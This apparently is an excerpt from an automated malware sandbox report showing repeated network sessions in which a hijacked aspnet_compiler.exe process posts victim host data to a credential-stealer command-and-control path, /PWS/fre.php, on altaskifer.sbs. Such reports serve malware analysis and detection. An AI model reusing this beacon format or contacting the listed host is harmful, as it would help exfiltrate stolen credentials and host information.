                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SdW0PsVramC5DARwKMyvGetN4yuyoAo75HXSW8%2BjSWp3Ulfu2wpIkSeiPUE4kL7CAdIedM0ex6aTGhBa45IgrGf5s%2FtqRAqMCUJSz9iAm2EW8UxwGKTDJChfvn6Zd9Liew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012d78879749b-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                88192.168.2.649816172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:38.088059902 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:38.212032080 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:38.584656000 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:38 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JGN5aB3J04%2FyS365v6%2B4PyMsD234ZDfIjc%2F9UFLpMKb64x2cgVkGnIke3nB6cHceGgpFVw38TRBv1hm6nn7k3X4HUK6cPC60wYF43RMy1FQ5qt0F3P2Fd2%2BA8%2FpMNNjoeg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012dc7bab67b6-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                89192.168.2.649818172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:38.861510038 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:38.985732079 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:39.373178959 CEST609INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:39 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pkgB%2FLkTH7CTZzuQih0GVx%2Bp%2Bge3J2WS1y2EgaaADG%2BSS6TKbyC4YfwGMuVquHZME%2FBfAoQ0JgIDTgDCJYq2aX0ADQKovGsITa0PNLRGcSrwpNBrOGP%2BS%2FBzo6XmqoMaAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012e14b099ac3-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                90192.168.2.649819172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:39.686953068 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:39.811068058 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:40.186532974 CEST609INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:40 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ccwN%2FpCdPy%2FwPKAMvwDsfiF3U7jjIhQUt8f0%2Fbvs2Jo9PaADCGqTNMvOAIpkfbbtzZhyY5YN4qneMfx2A07JA%2Bq4WtbMB18%2Ff04np%2FjdAmtUv%2FV1aclwh4H7UGOWcnyS0w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012e66d731283-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                91192.168.2.649820172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:41.966392994 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:42.092147112 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:42.459868908 CEST599INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:42 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qAHkxWa0D4GcqfCe4DJwESRChVEDVlKcZ0KJS0e5yte2UxBEpNsEPD9GpVuVyUH4NxIP5R0MGifwSndIHskUWag%2B%2Bbt8KH9vEl2U03JoVZBvxI1iXUjv5vcIAz0QPsP39Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012f4ab24b3e3-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                92192.168.2.649821172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:42.736556053 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:42.860810995 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:43.230144024 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:43 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t46F777Fxa%2BJJh4mNZOBK4Jx3wAE%2Fwdo0%2FrJyTioFBY7bRjRndv%2FtTOQ8yLn3bajBfnaDZEK1M%2BcpZgO9t2vGbDRv0NewZb0sUFlgDSFZ9K590eDXlIlawaPrN%2BmUhQbyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012f98b9531ea-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                93192.168.2.649822172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:43.503602982 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:43.627749920 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:43.994375944 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:43 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9dNRpSdAPuYYGpHnw4NKdVL2lPXBg1kZBY9RHqmOeELLvJe3sP83uw4Qw2nXxRCnYbJon%2BWxoUuDjWgUhCcUZOlD%2BcOYSEDvkOAJKwblkr91gp1K8GpkcGs%2B5eh2MZWpbw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012fe4ba25c6c-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                94192.168.2.649823172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:44.269499063 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:44.393898010 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:44.762161970 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:44 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ptBZFbctPrL1REctM6vRt6Sig%2Bhhqvr3J6Vy018vwpb5ayomFDN7O8og90oLmwrTfM7%2BbKoG5UrZZbkzKsHfZiuRYAYzDrItABZX%2BUmHd4%2FG8SXu76yOLB%2FJGjYDUZFGLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013031fe58bff-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                95192.168.2.649824172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:45.042074919 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:45.165846109 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:45.534812927 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:45 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oex9%2BW6WPDQPeApDG4IAFLgghVvegzK8wrsNU28csRaP1ja%2FHV%2BsXyGLcGejjxwVnWRFLrMFLAPDvHJpTtUvanFWqoeKL1%2FHhxlsIle6utu8o6Ie0nPVNTv3ApblGiQuwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001307efe3d9f5-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                96192.168.2.649825172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:45.801532984 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:45.927334070 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:46.311472893 CEST595INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:46 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CGtFyemBNG8Z9WH1MtcqYAZ8SowF0rrvh0IP0XpEoBofwMVhUxLTDJBd9LXkixRWpywK1kUVh5LbpLUeIDu9cgumV3KwtbbYQTeq9dCrJQrNoFPWtvws3d233MMJd4stBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700130cabbb742a-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                97192.168.2.649826172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:46.592041969 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:46.717474937 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:47.092871904 CEST599INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:47 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MT1VPKLAZeHCllT8b2aTC2Xk3ILwT0FgTuDIs4IwVLQY04KK4s0BVvkiTGmxU%2FBQ3VM1BUHLbIZQPKlNcuMuPScwIcKcjK4dXMiYLPJrTYzWrrceqbRpN6eC%2FZyU0421Lw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013119a867441-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                98192.168.2.649827172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:47.361320972 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:47.485132933 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:47.897085905 CEST601INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:47 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ozc3S4s1s5Q4uB6NzTdbfzMyScDFaE%2BNey1b0nKYQWAgooBsbmh03rs36gi05CVE4q6tPzkfBqp3A8Dp3QO8Hbq7y2afJGM%2FwGmxpiz%2BIklkrH8BJxkh8rNqVp639qy42g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013166d2c288c-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                99192.168.2.649828172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:48.181653976 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:48.306097031 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:48.690085888 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:48 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uY9vyZJlJrx0YuVyMjrl9i0JcBqDvgucGJt1HYud3nfSBXxUHDAp6pBOMNtzEJ43cLaYOKYRotE7xrqFfA%2FAWaOvtb9E9ojlwnIOy%2BgFtqA%2BxaNf1CNi%2B41s1FjzZNXG8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700131b8c582257-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                100192.168.2.649829172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:48.957387924 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:49.081947088 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:49.472393036 CEST599INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:49 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ia3qjY4I0NDb1ZYV7qdQsSHfIByuNN6DLRJhmndTGSRVsJya65QxFzbEkbPwI1zweOLLWiCnUMwhYNEHBflLWaP0B4S1FOjmtXa1AOsLLN8PO%2BHwQju6%2BVkuXAVpeujUKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870013206bea5c79-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                101192.168.2.649830172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:49.735328913 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:49.860052109 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:50.249002934 CEST597INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:50 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
